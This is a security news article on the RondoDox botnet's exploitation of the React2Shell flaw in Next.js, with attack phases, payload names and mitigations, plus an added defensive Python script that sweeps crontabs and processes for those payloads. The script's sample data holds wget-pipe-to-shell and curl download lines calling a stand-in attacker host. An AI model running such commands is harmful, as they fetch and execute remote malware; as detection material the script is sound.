Abstract representation of a botnet attacking various internet-connected devices and web servers, symbolizing the RondoDox threat.

RondoDox Botnet Unleashes Havoc: Exploiting React2Shell to Seize IoT and Web Servers

A sophisticated and relentless cyber campaign, spanning nine months, has culminated in the widespread hijacking of Internet of Things (IoT) devices and web applications, enrolling them into a formidable botnet known as RondoDox. Cybersecurity researchers have recently unveiled the intricate details of this operation, highlighting its alarming scale and the critical vulnerabilities it exploits.

The Critical React2Shell Flaw: A Gateway for Attackers

At the heart of RondoDox’s latest surge is the exploitation of the newly disclosed React2Shell vulnerability (CVE-2025-55182), boasting a maximum CVSS score of 10.0. This critical flaw, affecting React Server Components (RSC) and Next.js, grants unauthenticated attackers the ability to execute remote code on vulnerable systems. As of December 2025, CloudSEK’s analysis confirms React2Shell as the primary initial access vector for the botnet.

The scale of this vulnerability is staggering. Data from the Shadowserver Foundation indicates approximately 90,300 instances remain susceptible to React2Shell as of December 31, 2025. A significant majority, 68,400 instances, are located in the U.S., followed by Germany (4,300), France (2,800), and India (1,500), underscoring a global threat landscape.

RondoDox: A Botnet’s Evolution and Expansion

Emerging in early 2025, the RondoDox botnet has demonstrated remarkable adaptability and a continuous drive for expansion. It has systematically broadened its arsenal by incorporating new N-day security vulnerabilities, including CVE-2023-1389 and CVE-2025-24893, alongside the potent React2Shell exploit. The abuse of React2Shell by RondoDox was previously flagged by leading cybersecurity firms such as Darktrace, Kaspersky, and VulnCheck, signaling its growing notoriety.

Anatomy of an Attack: Three Distinct Phases

The RondoDox campaign is meticulously structured, having progressed through three distinct phases prior to the widespread exploitation of CVE-2025-55182:

  • March – April 2025: Initial Reconnaissance and Manual Scanning
    The threat actors began with targeted reconnaissance and manual vulnerability scanning to identify potential targets.
  • April – June 2025: Daily Mass Probing
    This phase saw a significant escalation with daily mass vulnerability probing of popular web applications like WordPress, Drupal, and Struts2, as well as IoT devices such as Wavlink routers.
  • July – Early December 2025: Automated Large-Scale Deployment
    The campaign transitioned to an hourly, automated deployment on a massive scale, indicating a refined and efficient attack infrastructure.

Payloads, Persistence, and Preventing Reinfection

In the attacks observed in December 2025, the RondoDox operators initiated scans for vulnerable Next.js servers, subsequently attempting to deploy a suite of malicious payloads. These included cryptocurrency miners ("/nuts/poop"), a botnet loader and health checker ("/nuts/bolts"), and a Mirai botnet variant ("/nuts/x86").

The "/nuts/bolts" component is particularly insidious. It is engineered to terminate competing malware and coin miners, ensuring RondoDox maintains exclusive control before downloading the primary bot binary from its command-and-control (C2) server. A variant of this tool goes further, removing known botnets, Docker-based payloads, artifacts from previous campaigns, and associated cron jobs, while establishing persistence via "/etc/crontab". CloudSEK notes its aggressive self-preservation: "It continuously scans /proc to enumerate running executables and kills non-whitelisted processes every ~45 seconds, effectively preventing reinfection by rival actors."

Mitigating the RondoDox Threat

Given the severity and persistence of the RondoDox botnet, organizations must take immediate and decisive action:

  • Patch Next.js: Update Next.js to a patched version without delay to address the React2Shell vulnerability.
  • Network Segmentation: Isolate all IoT devices into dedicated VLANs to limit potential lateral movement.
  • Deploy WAFs: Implement Web Application Firewalls (WAFs) to detect and block malicious traffic targeting web applications.
  • Monitor Processes: Continuously monitor for suspicious process execution on servers and IoT devices.
  • Block C2 Infrastructure: Block known command-and-control (C2) infrastructure associated with RondoDox.
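The "Monitor Processes" item above and the payload section earlier (the "/nuts/poop", "/nuts/bolts" and "/nuts/x86" names, and persistence written to "/etc/crontab") can be turned into a simple host-side sweep. The following Python script is an added example written for this article, not code from the article's source or from CloudSEK: it checks crontab text and process command lines for the payload path names the article reports, and can optionally read live command lines from /proc on a Linux host. The sample crontab, the sample process list and the 203.0.113.10 download host are constructed for the example and are not indicators from the article.

```python
"""Indicator sweep for the RondoDox payload names described in the article.

Two inputs are checked: crontab text (the article reports persistence via
/etc/crontab) and process command lines (the article recommends continuous
process monitoring). Only the payload path names from the article are used
as indicators; every other value here is constructed for the example.
"""
import os
from dataclasses import dataclass

# Payload path fragments taken from the article's description of the campaign.
RONDODOX_PAYLOAD_PATHS = ("/nuts/poop", "/nuts/bolts", "/nuts/x86")


@dataclass(frozen=True)
class Finding:
    source: str      # "crontab" or "process"
    reference: str   # crontab line number or PID, as text
    line: str        # the offending crontab entry or command line
    indicator: str   # which payload path matched


def _first_indicator(text: str):
    """Return the first payload path present in text, or None."""
    for indicator in RONDODOX_PAYLOAD_PATHS:
        if indicator in text:
            return indicator
    return None


def scan_crontab(text: str) -> list[Finding]:
    """Flag non-comment crontab entries that reference a known payload path."""
    findings = []
    for number, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        indicator = _first_indicator(line)
        if indicator:
            findings.append(Finding("crontab", str(number), line, indicator))
    return findings


def scan_process_cmdlines(cmdlines) -> list[Finding]:
    """Flag (pid, cmdline) pairs whose command line references a payload path."""
    findings = []
    for pid, cmdline in cmdlines:
        indicator = _first_indicator(cmdline)
        if indicator:
            findings.append(Finding("process", str(pid), cmdline, indicator))
    return findings


def live_process_cmdlines(proc_root: str = "/proc"):
    """Yield (pid, cmdline) for running processes on a Linux host.

    /proc/<pid>/cmdline separates arguments with NUL bytes; they are joined
    with spaces here. Processes that exit mid-read are skipped.
    """
    if not os.path.isdir(proc_root):
        return
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        try:
            with open(os.path.join(proc_root, entry, "cmdline"), "rb") as fh:
                raw = fh.read()
        except OSError:
            continue
        cmdline = raw.replace(b"\x00", b" ").decode("utf-8", "replace").strip()
        if cmdline:
            yield int(entry), cmdline


# Constructed sample crontab: one benign system entry and one persistence entry
# of the kind the article describes (host address is a documentation IP).
SAMPLE_CRONTAB = """\
# /etc/crontab: system-wide crontab (constructed sample)
SHELL=/bin/sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root /bin/sh -c "wget -qO- http://203.0.113.10/nuts/bolts | sh"
"""

# Constructed sample process table with two payload-related command lines.
SAMPLE_CMDLINES = [
    (1, "/sbin/init"),
    (812, "/usr/sbin/sshd -D"),
    (4021, "/var/tmp/nuts/x86"),
    (4022, "sh -c curl -s http://203.0.113.10/nuts/poop -o /var/tmp/poop"),
]


def sweep(crontab_text: str, cmdlines) -> list[Finding]:
    """Run both checks and return all findings in one list."""
    return scan_crontab(crontab_text) + scan_process_cmdlines(cmdlines)


if __name__ == "__main__":
    # Demonstrate on the constructed samples; switch the second argument to
    # live_process_cmdlines() to sweep the current host instead.
    for f in sweep(SAMPLE_CRONTAB, SAMPLE_CMDLINES):
        print(f"[{f.source}:{f.reference}] {f.indicator} -> {f.line}")
```

A match on these names is a strong signal on a host that should never fetch or run such paths, but the article's "/nuts/bolts" variant also deletes rival cron jobs and artifacts, so an empty sweep result does not prove a host is clean; pair this with the patching, segmentation and C2 blocking steps listed above.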

The RondoDox botnet serves as a stark reminder of the evolving threat landscape and the critical importance of proactive cybersecurity measures. Staying vigilant and implementing robust defenses are paramount to protecting digital assets from such sophisticated attacks.
